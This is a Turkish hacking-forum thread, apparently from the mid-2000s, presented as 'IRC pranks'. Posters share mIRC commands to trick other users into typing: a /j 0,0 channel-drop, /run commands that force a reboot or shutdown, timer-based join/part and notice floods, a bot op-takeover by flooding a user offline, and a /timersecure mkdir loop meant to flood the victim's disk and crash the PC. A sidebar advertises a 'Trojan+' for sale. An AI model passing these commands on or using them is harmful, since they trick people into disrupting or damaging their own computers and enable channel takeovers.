basit irc şakaları :)merhaba arkadaslar ircde tanıdıklarınıza yakın arkadaslarınıza saka yapmak için komutlar ideal :) ben denedim bi calısıyor mesela /j 0,0 diyoruz karsıdaki kim olursa olsun ister root admin ister user direk
Konu cyberaser tarafından açılmış, 4554 kişi tarafından görüntülenip, 18 yanıt almış.
|
Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!
|
|||||||
basit irc şakaları :) konusundaki toplam yorum: 18, okunma sayısı: 4554. |
|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
#1 |
|
Çırak
![]() Kayıt Tarihi: Dec 2005
Üye numarası: #42486
Karma etkisi: 0
![]() Karma: 10
|
merhaba arkadaslar ircde tanıdıklarınıza yakın arkadaslarınıza saka yapmak için komutlar ideal
ben denedim bi calısıyor mesela /j 0,0 diyoruz karsıdaki kim olursa olsun ister root admin ister user direk bulundugu bütün kanallardan düşüyor ben cok yaptım arkadaslara diğer bir komut ise /run runonce -q bu komut ne işemi yarıyor sölim karsıdaki kisinin pc ye reset attırıyo zarar vermiyo ama adamı hasta edebiliyo ![]() yaw bu şakaların dışında ciddi irc saldırı komutları var ama onlarıda belki daha sonra yazarım simdilik bi kactane öğrendim ama denemeden olmaz dimi ama herkese selamlar.. |
|
|
|
|
|
#2 |
|
Forum Kalfası
![]() ![]() ![]() ![]() Kayıt Tarihi: Feb 2005
Üye numarası: #2060 Yer: ZonguLdak
Karma etkisi: 17
![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 867
|
/j 0,0 yapınca sen düşüyosun kanallardan
|
|
|
|
|
|
#3 | |
|
Banned
![]() ![]() ![]() Kayıt Tarihi: Apr 2005
Üye numarası: #10752
![]() Karma: 32
|
Alıntı:
arkadaşım bu komutu sen yazmıcaksın karşı tarafa yazdıracaksın ee tabi sen düşersin bu komutu sen yazarsan ![]() |
|
|
|
|
|
|
#4 | |
|
Cool Üye
![]() ![]() ![]() Kayıt Tarihi: May 2005
Üye numarası: #17137 Yer: Isvec
Karma etkisi: 8
![]() Karma: 59
|
yaw bu şakaların dışında ciddi irc saldırı komutları var ama onlarıda belki daha sonra yazarım simdilik bi kactane öğrendim ama denemeden olmaz dimi ama
herkese selamlar..Atma arkadasim atma! ircde saLdiri komutu die bisey yok saLLama. ama iLLahada var diyosan ispatLada goreLim... Alıntı:
|
|
|
|
|
|
|
#5 |
|
Çırak
Üye numarası: #42486
|
iric;
arkadasım enazından timer de bir saldırı komutu sayılır bilmiyorsan yazayım yani /timer 00 00 /say mesajın ki bu komutla kanalda özellikle siberv1 scripti ile aopları bile düşürülebiliyor laga sokularak..İkincisi ise; /ns set greet Msj/timer 0 0 /timer 0 0 /hop #kanal : bu Kanala join/part flood saldırıdır Üçüncüsü ; /timer 0 0 /timer 0 0 /notice nick mesajınız : Buda özele noticesaldırısı Dördüncüsü; Op Taklidi: Bota kayıtlı kullanıcı bottan op istediği anda saldırgan kullanıcıya flood saldırısı yaparak bağlantısının kesilmesini sağlıyor. Daha sonra kullanıcının nickini alarak bottan op almış oluyor. Normal olarak bir botun kayıtlı bir kullanıcıya op vermesi şu şekilde gerçekleşir: ** Kullanıcı bota istek gönderir ** Kullanıcı: /MSG botadi op şifre ** Bot bir op istediği alır ve kullanıcı dosyasından bu kullanıcıyı arar ** ** Kullanıcının kaydını bulur ve op verir ** Bot: /MODE #kanal +o kullanıcı Saldırı sırasında ise şunlar olur: ** Kullanıcı bota istek gönderir ** Kullanıcı: /MSG botadi op şifre ** Bot bir op istediği alır ve kullanıcı dosyasından bu kullanıcıyı arar ** ** Kullanıcının kaydını bulur ve op verir ** ** Bu arada saldırgan kullanıcıya flood saldırısı yapar ** ** Kullanıcının saldırgan nedeniyle bağlantısı kesilir ** ** Daha sonra saldırgan kullanıcının nickini alır ** saldırgan -> kullanıcı Bot: /MODE #kanal +o kullanıcı ki bunlar bilinen saldırı tipleri bunların dışında bir ikitane öğrendim ama ben sahsen bu komutları denemedim cunku cesaret edemedim ve yeni öğrendim buyrun deneyin belki calısmıyor olabilir belki de kendi ipinizi kendiniz çekersiniz ) ama darbeturkden aldım bu komutları diyebilirimKaynak: Wardom http://www.wardom.com.tr/showthread.php?t=32808 /timersecure 0 0 //mkdir $mid(C:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z) Eger bu üsttekini yazdırırsanız HDD de binlerce dosya olusacak ! ve Pc çökecektir ! eğer daha küçük bir zarar vermek istiyorsanız ... |
|
|
|
|
|
#6 |
|
Çırak
Üye numarası: #44986
|
/j 0,0 komutunu karşı tarafa yzadıracaksınız
![]() |
|
|
|
|
|
#7 |
|
Çırak
![]() Kayıt Tarihi: May 2005
Üye numarası: #17991
|
/partall İşte
|
|
|
|
|
|
#8 |
|
Cool Üye
![]() ![]() ![]() Kayıt Tarihi: Dec 2005
Üye numarası: #43361
Karma etkisi: 7
![]() Karma: 17
|
o dedigini yazarsa kendine reset ceker bu durumda sadece kendini hasta eder
![]() |
|
|
|
|
|
#9 |
|
Cool Çırak
![]() Kayıt Tarihi: Jan 2006
Üye numarası: #48825
Karma etkisi: 7
|
acil biri yardım etsin yaw yukarıdaki komutu bi arkadasa yaptırdım o inekte yedi şimdi bundan kurtulmak lazım nası yapcas
![]() |
|
|
|
|
|
#10 |
|
Hızlı Çırak
![]() ![]() Kayıt Tarihi: Jan 2007
Üye numarası: #105869
Karma etkisi: 6
![]() Karma: 74
|
pylşım için saol krdş çok işime yarıyo ...
|
|
|
|
|
|
#11 |
|
Banned
![]() ![]() ![]() ![]() ![]() Kayıt Tarihi: Feb 2005
Üye numarası: #2687 Yer: 'im şişelerin dibi
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 824732
|
saolun arkadaşlar çok güsel şeyler sölemişsini z.....
|
|
|
|
|
|
#12 |
|
Banned
![]() Kayıt Tarihi: May 2005
Üye numarası: #18888 Yer: Paris
|
/run rundll32.exe user,exitwindows bir bu komutu dene ircde
![]() |
|
|
|
|
|
#13 |
|
Çırak
![]() Kayıt Tarihi: Feb 2007
Üye numarası: #110690
|
sen cok uyanıksın sen komutun uzantısı nerde bitiyo tam yaz ben deniyim ne yani windows mu çökecek
) formatmı attıracakarkadaşım bu olaylarda ctcp acık olmayan server lerde bişi yapamazsınız acık olsa dahi karşi tarafın mircine szmalısınız neyse lamer komutlarıdırDüzenleyen Kaan_13 : 16-03-2007 at 11:40. Sebep: eksik metin |
|
|
|
|
|
#14 |
|
Çırak
![]() Kayıt Tarihi: Jan 2008
Üye numarası: #180558 Yer: istanbul / kAyNaRcA
|
yaw bunlarda komutmu yemeyin ße/\/i ߣa KaRd£$!mMm...
|
|
|
|
|
|
#15 |
|
Banned
![]() ![]() ![]() Kayıt Tarihi: Nov 2007
Üye numarası: #164677 Yer: İstanbul